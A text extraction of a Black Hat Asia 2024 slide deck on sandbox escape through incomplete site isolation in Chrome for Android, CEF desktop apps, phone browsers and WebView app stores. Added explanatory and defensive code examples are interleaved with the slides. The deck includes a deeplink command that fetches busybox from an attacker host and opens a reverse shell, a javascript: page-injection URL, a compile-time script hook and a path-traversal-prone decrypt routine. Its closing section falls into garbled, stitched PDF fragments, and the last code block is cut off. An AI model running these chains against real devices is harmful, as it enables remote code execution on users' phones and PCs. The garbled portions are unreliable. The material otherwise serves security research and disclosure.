Asia-24-Liu-The-Hole-in-Sandbox.pdf (PDF, 68 pages, 2.72 MB)

The Hole in Sandbox: Escape Modern Web-Based App Sandbox From Site-Isolation Perspective
Bohan Liu, Haibin Shi
Tencent Security Xuanwu Lab
#BHASIA @BlackHatEvents

---
Who are we

Bohan Liu (P4nda20371774)
- Security researcher at Tencent Security Xuanwu Lab
- Mainly engaged in browser security
- Google Chrome bug hunter

Haibin Shi (Aryb1n)
- Security researcher at Tencent Security Xuanwu Lab
- Android security

---
Introduction

---
Multi-process Architecture in Chrome

(Figure: the renderer process, made up of the JavaScript engine, memory allocator, rendering engine, DOM, CSS, media and Web APIs. The source URL on the slide is truncated.)

---
Sandbox in Chrome

(Figure: the same renderer components behind a sandbox boundary, talking to the browser process over IPC: an IPC client in the renderer, an IPC server in the browser.)

Do not re-invent the wheel:
- Windows: a restricted token, the Windows job object, the Windows desktop object and integrity levels
- Linux: Seccomp-BPF and user namespaces
- Android: SELinux

- Principle of least privilege
- Mandatory access controlled environment
- Isolated process for HTML rendering and JavaScript execution
- Limited resource access
- Limited IPC/kernel interaction access

---
The capabilities of renderer RCE

What can an attacker do with shellcode in the renderer?
1. Invoke limited system calls and access limited resources.
2. Send evil IPC with ANY arguments.
3. Patch ALL code in the renderer process.

(Figure labels: mprotect, /etc/hosts. The source URL on the slide is truncated.)

---
Any other next steps after renderer RCE, except sandbox escape?

- GPU or network process RCE
- Universal Cross-Site Scripting

Renderer RCE -> Sandbox Escape
Renderer RCE -> Universal XSS

---
From Renderer RCE to UXSS

---
What is UXSS?

XSS vs UXSS (figure, partly truncated on the slide):
- XSS: an evil parameter is sent to the web server and alert(xss) is injected on the web site.
- UXSS: a UXSS exploit injects alert(xss) when ... (truncated).

---
The History of UXSS

UXSS is a long-standing problem that plagues various browsers.

---
How To UXSS

What stops us from injecting code from other domains? DEMO!

```javascript
window.addEventListener('load', function () {
  var iframe = document.getElementById('myFrame');
  var script = document.createElement('script');
  script.textContent = 'alert("UXSS")';
  var iframeObject = iframe.contentWindow;
  // Throws: reading a cross-origin document is blocked by the same-origin policy
  console.log(iframeObject.document.body.appendChild(script));
});
```

Access blocked due to SOP.

---
How To UXSS

The same-origin policy (SOP) restricts web pages from making requests to a different domain than the one that served the original web page.
- Protocol (scheme): the protocol (HTTP or HTTPS) of the two origins must be the same.
- Domain: the domain of the two origins must be the same.
- Port: if a port is specified in the URL, it must be the same for both origins.

Access blocked due to SOP. How to bypass SOP?

---
Case Study: SOP Bypass via Renderer RCE in Safari

"Forget the Sandbox Escape: Abusing Browsers from Code Execution" - Amy Burnett, BlueHatIL 2020

- Condition 1: the attacker's page and the victim iframe are in the same renderer.
- Condition 2: the check code (such as SOP) is in the renderer process.
- Condition 3: the domain structure used by the check code is also in that process.
=> Modify data in the renderer process to bypass the check.

1. Overwrite m_universalAccess in the SecurityOrigin of the domain -> bypass the check on cross-domain data access -> inject the XSS payload into the iframe.
2. Overwrite protocol, host and port in the SecurityOrigin of the domain -> bypass X-Frame-Options -> make any site loadable in an iframe.

The WebKit checks involved, as excerpted on the slide (source URL truncated):

```cpp
bool DOMWindow::isInsecureScriptAccess(DOMWindow& activeWindow, const String& urlString)
{
    // ...
    if (activeWindow.document()->securityOrigin().canAccess(document()->securityOrigin()))
        return false;
    // ...
    printErrorMessage(crossDomainAccessErrorMessage(...));
    // ...
}

bool FrameLoader::shouldInterruptLoadForXFrameOptions(...)
{
    // ...
    XFrameOptionsDisposition disposition = parseXFrameOptionsHeader(content);
    switch (disposition) {
    case XFrameOptionsSameOrigin:
        // Check if the parent is the same origin
        if (!origin->isSameSchemeHostPort(topFrame.document()->securityOrigin()))
            return true;
        return false;
    case XFrameOptionsDeny:
        // Always interrupt load
        return true;
    // ...
    }
}
```

Parent page: https://... (truncated on the slide). Iframe page: https://... (truncated on the slide).

---
UXSS Harden in Chrome

The same three conditions (Burnett, BlueHatIL 2020) apply: the attacker's page and the victim iframe in one renderer; the check code in the renderer process; the domain structure used by the check also in that process => modify data in the renderer process to bypass the check.

Reference: https://research.google/pubs/analysis-of-uxss-exploits-and-mitigations-in-chromium/

Mitigations in Chromium:
- Out-of-Process iframes (OOPIFs): allow a child frame of a page to be rendered by a different process than its parent frame. Kills condition 1.
- PlzNavigate: move the cross-origin security checks to the browser process. Kills conditions 2 and 3.
- Site Isolation: limits each renderer process to documents from a single site. The most promising countermeasure against UXSS attacks.
Dates on the slide's timeline: 2017.02, 2017.10, 2018.07.

---
What is Site Isolation?

Principle: treat each web site as a separate security principal requiring a dedicated renderer process.

What's new:
- Site principals
- Dedicated processes
- Cross-process navigations
- Out-of-process iframes
- Cross-Origin Read Blocking

https://www.usenix.org/system/files/sec19-reis.pdf

(Figure: process-per-tab model vs site isolation model. In the process-per-tab model, tab/window A and the iframe it embeds share one process; in the site isolation model the top document runs in process A and the cross-site iframe in process B. A second panel shows the same for 1. window.open("http://...") and 2. location.href = "http://...": cross-process navigations and out-of-process iframes. The URLs on the slide are truncated.)

---
How is Site Isolation implemented?

How to trace the code? Start from NavigationRequest::StartNavigation, which binds the navigation to the process of either the current or the speculative RenderFrameHost:

```cpp
void NavigationRequest::StartNavigation() {
  // ...
  if (associated_rfh_type_ != AssociatedRenderFrameHostType::NONE) {
    RenderFrameHostImpl* navigating_frame_host =
        associated_rfh_type_ == AssociatedRenderFrameHostType::SPECULATIVE
            ? frame_tree_node_->render_manager()->speculative_frame_host()
            : frame_tree_node_->current_frame_host();
    SetExpectedProcess(navigating_frame_host->GetProcess());
  }
  // ...
}
```

That choice is made in RenderFrameHostManager::GetFrameHostForNavigation. The SiteInstance determines whether to switch the RenderFrameHost or not:

```cpp
// (return type elided on the slide)
RenderFrameHostManager::GetFrameHostForNavigation(
    NavigationRequest* request,
    BrowsingContextGroupSwap* browsing_context_group_swap,
    std::string* reason) {
  SiteInstanceImpl* current_site_instance = render_frame_host_->GetSiteInstance();
  bool is_same_site = render_frame_host_->IsNavigationSameSite(request->GetUrlInfo());
  IsSameSiteGetter is_same_site_getter(is_same_site);
  scoped_refptr<SiteInstanceImpl> dest_site_instance =
      GetSiteInstanceForNavigationRequest(request, is_same_site_getter,
                                          browsing_context_group_swap, reason);
  // A subframe should always be in the same BrowsingInstance as the parent
  // (see also https://...)
  bool use_current_rfh = current_site_instance == dest_site_instance;
  // ...
  if (use_current_rfh) {
    request->SetAssociatedRFHType(NavigationRequest::AssociatedRenderFrameHostType::CURRENT);
    // ...
  } else {
    // ...
    navigation_rfh = speculative_render_frame_host_.get();
    request->SetAssociatedRFHType(NavigationRequest::AssociatedRenderFrameHostType::SPECULATIVE);
    // ...
  }
  // ...
}
```

The destination SiteInstance is looked up, or created, in BrowsingInstance::GetSiteInstanceForURLHelper. Sites that do not need a process of their own land in the shared default SiteInstance:

```cpp
scoped_refptr<SiteInstanceImpl> BrowsingInstance::GetSiteInstanceForURLHelper(
    const UrlInfo& url_info,
    bool allow_default_instance) {
  const SiteInfo site_info = ComputeSiteInfoForURL(url_info);
  auto i = site_instance_map_.find(site_info);
  if (i != site_instance_map_.end())
    return i->second;

  // Check to see if we can use the default SiteInstance for sites that don't
  // need to be isolated in their own process.
  if (allow_default_instance &&
      SiteInstanceImpl::CanBePlacedInDefaultSiteInstance(isolation_context_,
                                                         url_info.url, site_info)) {
    scoped_refptr<SiteInstanceImpl> site_instance = default_site_instance_.get();
    if (!site_instance) {
      site_instance = new SiteInstanceImpl(this);

      // Note: |default_site_instance_| will get set inside this call
      // via RegisterSiteInstance().
      site_instance->SetSiteInfoToDefault(site_info.storage_partition_config());
      DCHECK_EQ(default_site_instance_, site_instance.get());
    }

    // Add |site_info| to the set so we can keep track of all the sites the
    // the default SiteInstance has been returned for.
    site_instance->AddSiteInfoToDefault(site_info);
    return site_instance;
  }

  return nullptr;
}
```

---
How is Site Isolation implemented?

When is a SiteInstance reused? Whether a site needs a dedicated process is decided by SiteInfo::RequiresDedicatedProcess, and its first question is whether every site is isolated:

```cpp
bool SiteInfo::RequiresDedicatedProcess(const IsolationContext& isolation_context) const {
  DCHECK_CURRENTLY_ON(BrowserThread::UI);
  DCHECK(isolation_context.browser_or_resource_context());

  // If --site-per-process is enabled, site isolation is enabled everywhere.
  if (SiteIsolationPolicy::UseDedicatedProcessesForAllSites())
    return true;
  // ...
  return false;
}

// static
bool SiteIsolationPolicy::UseDedicatedProcessesForAllSites() {
  if (base::CommandLine::ForCurrentProcess()->HasSwitch(switches::kSitePerProcess))
    return true;
  if (IsSiteIsolationDisabled(SiteIsolationMode::kStrictSiteIsolation))
    return false;
  // The switches above needs to be checked first, because if the
  // ContentBrowserClient consults a base::Feature, then it will activate the
  // field trial and assigns the client either to a control or an experiment
  // group - such assignment should be final.
  return GetContentClient() &&
         GetContentClient()->browser()->ShouldEnableStrictSiteIsolation();
}

bool ContentBrowserClient::ShouldEnableStrictSiteIsolation() {
#if BUILDFLAG(IS_ANDROID)
  return false;
#else
  return true;
#endif
}
```

Strict site isolation is off by default on Android: we can reuse the same process after navigation in Android!
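To make the process models above concrete, here is an added example written for these notes; it is not code from the slides or from Chromium. It models the origin triple the SOP compares, the site principal (scheme plus registrable domain) Site Isolation keys on, and the three renderer-process policies the talk contrasts: process-per-tab, strict site isolation, and Android-style partial isolation where only a heuristic list of sites gets a dedicated process (the rest share the tab's default process, mirroring the default SiteInstance). PUBLIC_SUFFIXES is a constructed stub of the public-suffix list, "one process per site" is a simplification of SiteInstance/BrowsingInstance, and NAVIGATIONS is a constructed log. co_hosted_sites() answers the defender's question from the slides: which other sites would a compromised renderer of the untrusted document also hold.

```python
"""Origins, sites, and a toy model of three renderer-process policies.

Added example for these notes; not code from the Black Hat slides or from
Chromium. PUBLIC_SUFFIXES is a constructed stub (assumption) and the
one-process-per-site rule is a simplification of Chromium's SiteInstance logic.
"""
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443}
# Constructed stub of the public-suffix list; browsers use the full PSL.
PUBLIC_SUFFIXES = {"com", "net", "org", "co.uk", "github.io", "test"}


def origin(url):
    """The (scheme, host, port) triple the same-origin policy compares."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return (scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(scheme))


def same_origin(a, b):
    return origin(a) == origin(b)


def site(url):
    """The site principal used by Site Isolation: scheme + registrable domain (eTLD+1)."""
    scheme, host, _ = origin(url)
    labels = host.split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            # The registrable domain is one label in front of the public suffix.
            return (scheme, ".".join(labels[max(i - 1, 0):]))
    return (scheme, host)  # no known suffix: the whole host is the site


def same_site(a, b):
    return site(a) == site(b)


def assign_processes(navigations, policy, isolated_sites=frozenset()):
    """Map each (tab_id, url) navigation to a renderer-process number.

    "process-per-tab": every document in a tab shares the tab's renderer.
    "strict-site":     one renderer per site (--site-per-process, desktop default).
    "partial-site":    only sites in isolated_sites get a dedicated renderer; the
                       rest share the tab's default renderer, as on Android.
    """
    processes = {}  # process key -> process number

    def pid(key):
        return processes.setdefault(key, len(processes) + 1)

    assignment = {}
    for tab_id, url in navigations:
        if policy == "process-per-tab":
            key = ("tab", tab_id)
        elif policy == "strict-site":
            key = ("site", site(url))
        elif policy == "partial-site":
            s = site(url)
            key = ("site", s) if s in isolated_sites else ("tab-default", tab_id)
        else:
            raise ValueError(f"unknown policy {policy!r}")
        assignment[(tab_id, url)] = pid(key)
    return assignment


def co_hosted_sites(assignment, tab_id, url):
    """Other sites that share a renderer with the given document.

    After a renderer compromise in that document, this is the set a defender
    must assume is readable and injectable from it (the slides' condition 1).
    """
    me = assignment[(tab_id, url)]
    others = {site(u) for (t, u), p in assignment.items() if p == me}
    return others - {site(url)}


# Constructed navigation log: tab 1 visits an untrusted page, then two others.
NAVIGATIONS = [
    (1, "https://attacker.test/"),
    (1, "https://accounts.bank.test/login"),
    (1, "https://news.test/"),
    (2, "https://attacker.test/"),
]
# Constructed heuristic list, e.g. "sites where users log in with a password".
ISOLATED = {site("https://accounts.bank.test/")}

if __name__ == "__main__":
    for policy in ("process-per-tab", "strict-site", "partial-site"):
        a = assign_processes(NAVIGATIONS, policy, ISOLATED)
        print(policy, "->", co_hosted_sites(a, 1, "https://attacker.test/"))
```

Under partial isolation the protected bank site gets its own process, but news.test still shares a renderer with the untrusted page, which is exactly the gap the next slides exploit.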

---
From Renderer RCE to UXSS in Android

The way to inject JavaScript into another page.

What we have:
- The ability to patch all of the code segment, or modify data, based on the renderer RCE.
- The victim page could be in the same process we control.

When to inject:
- DOM tree building
- JavaScript compilation
- JavaScript code execution

---
Hook the code of JavaScript compilation

The V8 entry point and the Blink caller that hands it the script source, as excerpted on the slide:

```cpp
MaybeLocal<Script> ScriptCompiler::Compile(Local<Context> context, Source* source,
                                           CompileOptions options,
                                           NoCacheReason no_cache_reason) {
  Utils::ApiCheck(!source->GetResourceOptions().IsModule(), "v8::ScriptCompiler::Compile",
                  "v8::ScriptCompiler::CompileModule must be used to compile modules");
  auto i_isolate = context->GetIsolate();
  MaybeLocal<UnboundScript> maybe =
      CompileUnboundInternal(i_isolate, source, options, no_cache_reason);
  Local<UnboundScript> result;
  if (!maybe.ToLocal(&result)) return MaybeLocal<Script>();
  v8::Context::Scope scope(context);
  return result->BindToCurrentContext();
}

v8::MaybeLocal<v8::Script> CompileScriptInternal(
    v8::Isolate* isolate,
    ScriptState* script_state,
    const ClassicScript& classic_script,
    v8::ScriptOrigin origin,
    v8::ScriptCompiler::CompileOptions compile_options,
    v8::ScriptCompiler::NoCacheReason no_cache_reason,
    std::optional<inspector_compile_script_event::V8ConsumeCacheResult>* cache_result) {
  v8::Local<v8::String> code = V8String(isolate, classic_script.SourceText());  // <- Hook

  // TODO(kouhei): Plumb the ScriptState into this function and replace all
  // Isolate->GetCurrentContext in this function with ScriptState->GetContext.
  if (ScriptStreamer* streamer = classic_script.Streamer()) {
    if (v8::ScriptCompiler::StreamedSource* source =
            streamer->Source(v8::ScriptType::kClassic)) {
      // Final compile call for a streamed compilation.
      // Streaming compilation may involve use of code cache.
      // TODO(leszeks): Add compile timer to streaming compilation.
      return v8::ScriptCompiler::Compile(script_state->GetContext(), source, code, origin);
    }
  }
  // ...
}
```

---
Hook the code of JavaScript compilation

The hook replaces the V8String call in CompileScriptInternal with a wrapper that substitutes the source text when a chosen condition holds:

```cpp
// Patched call site inside CompileScriptInternal:
v8::Local<v8::String> code = Evil_V8String(isolate, classic_script.SourceText());

inline v8::Local<v8::String> Evil_V8String(v8::Isolate* isolate,
                                           const ParkableString& string) {
  if (some_special_condition)
    return V8String(isolate, "alert('pwned')");
  else
    return V8String(isolate, string);
}
```

---
Hook the code of JavaScript compilation

1. The victim opens the attacker's site.
2. Patch the code via the renderer RCE:
   1. Find the base address of chrome.so.
   2. Call mprotect to set the code segment as rwx.
   3. Call mmap to allocate a code space in which to deploy Evil_V8String.
   4. Patch the code in CompileScriptInternal.
3. Navigate to the victim site:
   1. Clear the context.
   2. Reset location.href.
4. Trigger the UXSS when loading:
   1. Choose a good time to inject the JavaScript code, using some_special_condition.
   2. Enjoy your UXSS!

---
From Renderer RCE to UXSS in Android

Demo: Chrome for Android 90.0.4430.61

Issue 40070451: Security: Site Isolation for Android doesn't isolate all sites (https://issues.chromium.org/issues/40070451)

Renderer RCE -> Sandbox Escape
Renderer RCE -> Universal XSS

"However there's not much we can do here until we can get site isolation fully up on Android. Use heuristics to isolate the sites that need it most."

We can't inject JavaScript into ... after Chrome 92.

---
What are the sites that need isolation most?

- Sites where users log in by entering a password
- Sites using the industry-standard OAuth protocol
- Sites with a Cross-Origin-Opener-Policy (COOP) response header

Site isolation mainly protects private data related to user login, just as it was originally launched against side-channel attacks like Spectre. (Source URL truncated on the slide.)

What other unprotected but equally dangerous sites are there?

From the perspective of the Android Chrome developers, protecting just these sites is enough. But there is a category of apps called web-based apps, implemented with browser components built on Chromium, and a web-based app usually has more complex functions. Could these apps have survived using similar protection?

---
Examining Web-based App Design From Site Isolation Perspective

---
The Design of Web-based App

Why a web-based app?
- Multi-platform design can be completely consistent
- Content is easy to update
- Low development costs
- Some other benefits

In short, we have found that a lot of software includes components for displaying web content.

---
The Design of Web-based App

But sometimes just showing is not enough:
- We may want to check whether the user has installed a certain app, and which version
- We may want to check whether the user's other software is in logged-in mode
- And some other native capabilities beyond what the web offers

With the emergence of the JavaScript interface, it became possible to invoke native capabilities on the user's device from the web side.

---
The Design of Web-based App

Some JavaScript interfaces actually implement quite powerful functions:
- Open a native application
- Execute commands on the user's device
- Install applications on the user's device
- etc.
We call them privileged APIs. If we can also call these APIs from our own web pages, a sandbox-escape effect becomes possible!

But developers thought of this too, and limit the use of these privileged APIs to the websites they trust:

```javascript
if (checkUrlIfTrusted(url)) privilegedAPI(); else alert("Ooooops");
```

It seems that this kind of check is very comprehensive.

---
Is it possible to break the security assumption of trusted-domain checks + privileged APIs?

The prerequisite for security is that "the domain name that passes the check is trustworthy and not malicious". If we assume that the manufacturer protects the domain they trust well, is this considered secure?

Under perfect site isolation (i.e. full site isolation), there is indeed no way to do so without breaking out of the sandbox. In reality, is the site isolation in web-based apps really as perfect as developers imagine?

---
Renderer RCE -> Sandbox Escape
Renderer RCE -> Universal XSS

But does real-world software have perfect site isolation? Due to compromises on performance and other aspects, many web-based applications are deficient in their implementation of site isolation. In apps that do not implement full site isolation, we can use the UXSS approach to call any privileged API and achieve the effect of a sandbox escape.

Let's look at the design, and the attack methods, of the different types of apps in turn.

---
Escape Modern Web-Based App Sandbox From Site-Isolation Perspective

---
The Apps we care about

- Web-based app on PC, e.g. a PC application based on CEF
- Mobile browser, e.g. the default browser of a mobile phone
- Android app based on WebView, e.g. the app store of a mobile phone

The default browser of many major brands of mobile phones.

---
Type 1: PC Application based on CEF

---
How to develop a web-based app on PC?

Building blocks of a web-based app on PC (slide diagram):
- Browser component (WebView, libcef, electron)
- Resource (privileged domain): HTML, JavaScript, trusted sites, local resources
- Client function (client logic): Java/C++/node.js, privileged API, privileged domain resolution
- Local storage (offline functions, acceleration): cache files, database
- Remote storage (the real storage)
- Other (non-browser display interface)

Interactions between them: register the privileged API; export a JS object; register privileged domains; process parsing; client behaviour (upload/download/open); domain check; render; trigger client behaviour; parse and locate local resources; provide data for display; store data temporarily; asynchronous data transfer; extra features.

1. The privileged API code mainly implements the common functions of the client.
2. Many implicit deeplinks are registered in privileged domain resolution.

---
The weakness in a web-based app on PC?

What can be optimized in a web-based app? (Optimizing Chrome itself is difficult; it is easier to optimize the process of loading pages.)
1. When the app opens: a renderer process is created in the background.
2. When clicking a URL: display the window of the renderer process and navigate to the URL.
3. When closing the website: hide the window and navigate to about:blank.

Gains: 1. stability, 2. running speed, 3. good user experience: the overhead of startup and destruction is saved!
Cost: this kills site isolation, and we can get UXSS in the privileged domain!

---
Find more bugs in the privileged API

Privileged_API.cryptoAPI.decrypt(key, input, output, cb)
- Unverified input file source: UNC?
- Path traversal when writing files: ../../X.exe?
- Write any value to any file

Privileged_API.StartX.start()
- CreateProcess("", "X.exe", NULL, ...)
- Starts an executable file

The decrypt implementation as excerpted on the slide (the vulnerable original; both file paths come straight from the web page):

```cpp
BOOL decrypt(const wchar_t* inputFilePath, const wchar_t* outputFilePath,
             const char* key, Function* cb) {
  HANDLE hInputFile = CreateFile(inputFilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING,
                                 FILE_ATTRIBUTE_NORMAL, NULL);
  std::ofstream outputFile(outputFilePath, std::ios::binary);
  DWORD fileSize = GetFileSize(hInputFile, NULL);
  BYTE* inputData = new BYTE[fileSize];
  DWORD bytesRead;
  if (!ReadFile(hInputFile, inputData, fileSize, &bytesRead, NULL)) {
    cb();
    return FALSE;
  }
  CloseHandle(hInputFile);
  DecryptImpl(inputData);
  outputFile.write(reinterpret_cast<const char*>(inputData), bytesRead);
  outputFile.close();
  cb();
  return TRUE;
}
```

Chained together: Remote Code Execution.

---
Demo for a web-based app on PC

Remote Code Execution, visible on site.
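The decrypt() routine above opens whatever input and output path the page hands it. As an added example, written for these notes and not taken from the slides or from the product they describe, the Python below shows the validation such a privileged API should run before any I/O: refuse UNC, device and drive-letter paths, refuse absolute paths, resolve the remaining relative path and confine it to one directory, and refuse executable output names. DEMO_BASE and all sample paths are constructed.

```python
"""Confining the file arguments of a privileged decrypt(key, input, output, cb).

Added example for these notes; not code from the slides or from the product
they describe. The two defects listed for decrypt() -- an unverified input
source (a UNC path) and traversal in the output path (..\\..\\X.exe) -- become
checks that run before any file is opened. DEMO_BASE and the sample paths
are constructed.
"""
import ntpath
import os

# Constructed: the only directory this API may read from and write to.
DEMO_BASE = "/tmp/webapp-cache"
EXECUTABLE_SUFFIXES = {".exe", ".dll", ".bat", ".cmd", ".com", ".scr", ".lnk", ".ps1"}


def is_unc_or_device_path(path):
    r"""True for \\server\share, \\?\ and \\.\ prefixes (either slash style)."""
    return path.startswith(("\\\\", "//"))


def resolve_inside(base_dir, user_path):
    """Absolute target of user_path inside base_dir, or None if it escapes.

    Rejects UNC/device paths, drive letters and absolute paths outright; then
    resolves '..' and symlinks with realpath and requires the result to stay
    under base_dir. Both separators are treated as separators, as Windows does.
    """
    if is_unc_or_device_path(user_path) or ntpath.splitdrive(user_path)[0]:
        return None
    relative = user_path.replace("\\", "/")
    if os.path.isabs(relative):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def reject_reason(base_dir, input_path, output_path):
    """Why a decrypt(key, input, output, cb) call must be refused; None if allowed."""
    if resolve_inside(base_dir, input_path) is None:
        return "input path is outside the allowed directory (or UNC/drive/absolute)"
    out = resolve_inside(base_dir, output_path)
    if out is None:
        return "output path is outside the allowed directory (or UNC/drive/absolute)"
    if os.path.splitext(out)[1].lower() in EXECUTABLE_SUFFIXES:
        return "output would create an executable file type"
    return None


if __name__ == "__main__":
    for inp, out in (("blob.bin", "blob.dec"),
                     ("\\\\evil-host\\share\\blob.bin", "blob.dec"),
                     ("blob.bin", "..\\..\\X.exe")):
        print(repr(inp), repr(out), "->", reject_reason(DEMO_BASE, inp, out) or "allowed")
```

The order matters: the string-level refusals come first because realpath on a UNC or drive path would silently produce something relative on a non-Windows host, and the suffix check runs on the resolved name so that a traversal-free "tool.exe" inside the directory is still refused.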

---
Type 2: The default browser for phones

---
The Design of Mobile Browser

Why the vendor's default mobile browser?
- One of the few applications that can interact
- RCE is possible with just one click
- Pre-installed on your phone, no need to download
- Interaction points for mobile projects at Pwn2Own
This is an attractive target for security researchers!

---
The Design of Mobile Browser

Vendor's default mobile browser vs Android Chrome:
- The manufacturer's default browser is a secondary development based on Android
- Pre-installed on your phone, no need to download
- Interaction points for mobile projects at Pwn2Own

The site isolation mechanism implemented by the vendor's default browser is similar to Android Chrome: both are partial site isolation. So we can use the UXSS method mentioned earlier to inject JS into pages of the privileged domain and further control the privileged domain.

---
The Design of Mobile Browser

A case: the default browser of mobile phone A.
- After testing, we found that there are some advertising functions in the browser which enable silent installation of apps.
- After analysis, we found that such advertising functions can only be called from specific websites: privileged domains designated by the mobile phone manufacturer.

---
The Design of Mobile Browser

Useful privileged API:
- browser.openApp(app_name_string): apps can be opened based on app_name_string
- browser.installApp(app_name_string, callback): apps can be installed based on the parameter app_name_string; we can use the callback parameter to call openApp after installation.

---
The Design of Mobile Browser

This is not good enough: we found that only apps in the app store can be installed.
- We would need to upload a self-developed app with a backdoor to the app store, just like most Pwn2Own players in recent years.
- However, this method takes more time and carries the risk of being discovered by the auditors, and we had to rush to participate in TFC.
Are there other ways to exploit it?

---
The Design of Mobile Browser

A possible solution: we can control the device through existing apps in some app stores.
- The app needs to be able to interact with us to achieve the effect of executing an arbitrary command.
- After analysis, we identified the following applications: a terminal application or a scripting-language interpreter.

---
The Design of Mobile Browser

Why a terminal application? We found an app that executes the parameters passed in by deeplink as commands, like this:

terminal://xlabxlab?cmd=$whoami

So we can get a reverse shell by downloading and running busybox as nc:

terminal://xlabxlab?cmd=curl -o /data/data/terminal.app/busybox http://$ip:$port/busybox; chmod 755 /data/data/terminal.app/busybox; /data/data/terminal.app/busybox nc $ip $port -e /bin/sh

---
The Design of Mobile Browser

And the more flexible privileged API we need:
- browser.startActivityWithDeeplink(deeplink_string): software can be launched based on deeplink_string. Compared with openApp, this method can pass arguments when starting the app.

---
Demo

---
Type 3: WebView-based Android App with extremely high permissions

---
The Design of Android App based WebView

Why an Android app based on WebView? Most of these can probably be launched from the browser (CATEGORY_BROWSABLE).

Android app based on WebView vs mobile browser:
- The browser can load the content of any website.
- But a web-based app generally displays only some manufacturer-related content. When the app receives some untrustworthy content, it may even jump to the browser to open it.

---
The Design of Android App based WebView

A case: the default app store of mobile phone A.
- The target app is the manufacturer's built-in app store application, similar to the Google Play application.
- Apps can be installed and opened silently from the target app.
- The target app can probably be launched from the browser.
In summary, the target application is a great target for Pwn2Own and TFC.

---
The Design of Android App based WebView

Activity 1: the start point of the attack.
- Exported, BROWSABLE, registered for rich deeplinks
- Handles the Intent and distributes it to the different web-based activities

```java
void handleIntent() {
    Intent intent = getIntent();
    Uri data = intent.getData();
    String targetPage = UriUtils.getTargetPage(data);
    if (TextUtils.equals(targetPage, PAGE_LITE_WEB)) {
        launchTargetActivity(LiteWebActivity.class);
        return;
    }
    // ...
}
```

---
The Design of Android App based WebView

Activity 1 divides links into three types and processes them separately:
- Untrusted websites: jump to the browser to open them.
- Manufacturer-related sites: open in an Activity whose WebView has no privileged API.
- Websites related to the app store business: open in an Activity whose WebView has the privileged API.
(The example hosts of each type are blank on the slide.)

---
The Design of Android App based WebView

Activity 2: the Activity whose WebView has the privileged API.
- Has the privileged APIs we want to use
- No way to load untrusted domains

```java
@JavascriptInterface
public boolean usefulJSInterface1() { /* ... */ }

@JavascriptInterface
public boolean usefulJSInterface2() { /* ... */ }
```

---
The Design of Android App based WebView

Useful privileged API in Activity 2:
- market.install(app_name_string): apps can be opened based on app_name_string
- market.install(app_name_string, callback): apps can be installed based on app_name_string; we can use the callback parameter to call openApp after installation.

---
The Design of Android App based WebView

But we didn't find a way to load our own website in Activity 2. We have to find a way to load our exploit page first!

After some research, we found a target: Activity 3.
- An Activity whose WebView has no privileged API
- But it has a vulnerability that can inject arbitrary page content:

market://web?url=javascript:document.write(evilcode)

111、tEventsThe Design of Android App based WebViewThe Design of Android App based WebViewWhat we have now?Activity 1-Receive the Intent sent by the browser,and start Activity1 or Activity2 Activity 2-privileged API to open and install apps Activity 3-Load arbitrary website via vulnerability Is it possib

112、le to attack WebView in Activity2 through WebView in Activity3?#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewEmmm,After our testing:WebViewsbetween different Apps have complete site-isolation.But,there is only one WebView Renderer process in the

113、same App.-That means-Yes,there is no site-isolation between different Webviews in an App.#BHASIA BlackHatEventsThe Design of Android App based WebViewThe Design of Android App based WebViewSo,we completed the attack s:Browser:Send Intent to launch Activity1 in app store-Activity 1:Distribute Intent

114、to launch Activity2-Activity 2:Inject evil JS code Web Content in Activity 2:Send Intent to launch Activity1 in app store-Activity 1:Distribute Intent to launch Activity3-Activity 3:invoke Privileged API to Install and open App Sandbox Escape#BHASIA BlackHatEventsDemoDemo#BHASIA BlackHatEventsFor th

115、e implementation of site isolation Make heuristic site isolation configurable to protect privileged domain Perform same-origin judgment first and then decide whether to reuse the processSuggestionsSuggestionsFor Web based App developers Restrict privileges on JavaScript Interface API to prevent exce

116、ssive privileges Use immutable code whenever possible to implement high-risk operations#BHASIA BlackHatEventsAcknowledgementAcknowledgement Yang Yu(tombkeeper)Wei Liu YongkeWang(Rudykewang)HuimingLiu(liuhm09)Zheng Wang(xmzyshypnc1)GuanchengLi(Atuml1)#BHASIA BlackHatEventsThanksThanksBohan Liu(P4nda20371774)Haibin Shi(aryb1n)
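As an added example, not the vendor's code and not from the slides, one way to apply the "restrict privileges" suggestion at the deep-link entry point: the url parameter is validated before any WebView loads it, and navigations inside the privileged WebView are re-checked against the same allow-list. The class and method names, the host allow-list and the market://web?url= form are assumptions.

```java
// Added example (not the vendor's or the speakers' code): validating the URL carried by a
// deep link before any WebView loads it, and re-checking in-page navigations. The class and
// method names, the host allow-list and the market://web?url= form are assumptions.
import android.net.Uri;
import android.webkit.WebResourceRequest;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public final class DeepLinkGuard {
    // Constructed allow-list: only these hosts may be shown in the WebView that
    // exposes the privileged @JavascriptInterface methods (install/open apps).
    static final Set<String> PRIVILEGED_HOSTS =
            new HashSet<>(Arrays.asList("store.example-vendor.invalid"));
    static final String VENDOR_SUFFIX = ".example-vendor.invalid";

    public enum Route { BROWSER, PLAIN_WEBVIEW, PRIVILEGED_WEBVIEW, REJECT }

    /** Decides where the url= parameter of a market://web?url=... deep link may be opened. */
    public static Route route(String deepLink) {
        String target = Uri.parse(deepLink).getQueryParameter("url");
        if (target == null) return Route.REJECT;
        Uri uri = Uri.parse(target);
        String scheme = uri.getScheme();
        // Only https is ever handed to a WebView. javascript:, data:, file:, intent: and
        // similar schemes are refused here, which removes the document.write() injection vector.
        if (scheme == null || !scheme.equalsIgnoreCase("https")) return Route.REJECT;
        String host = uri.getHost();
        if (host == null || host.isEmpty()) return Route.REJECT;
        host = host.toLowerCase();
        if (PRIVILEGED_HOSTS.contains(host)) return Route.PRIVILEGED_WEBVIEW;
        if (host.endsWith(VENDOR_SUFFIX)) return Route.PLAIN_WEBVIEW;
        return Route.BROWSER;  // untrusted content never enters either WebView
    }

    /** Client for the privileged WebView: any navigation off the allow-list is blocked. */
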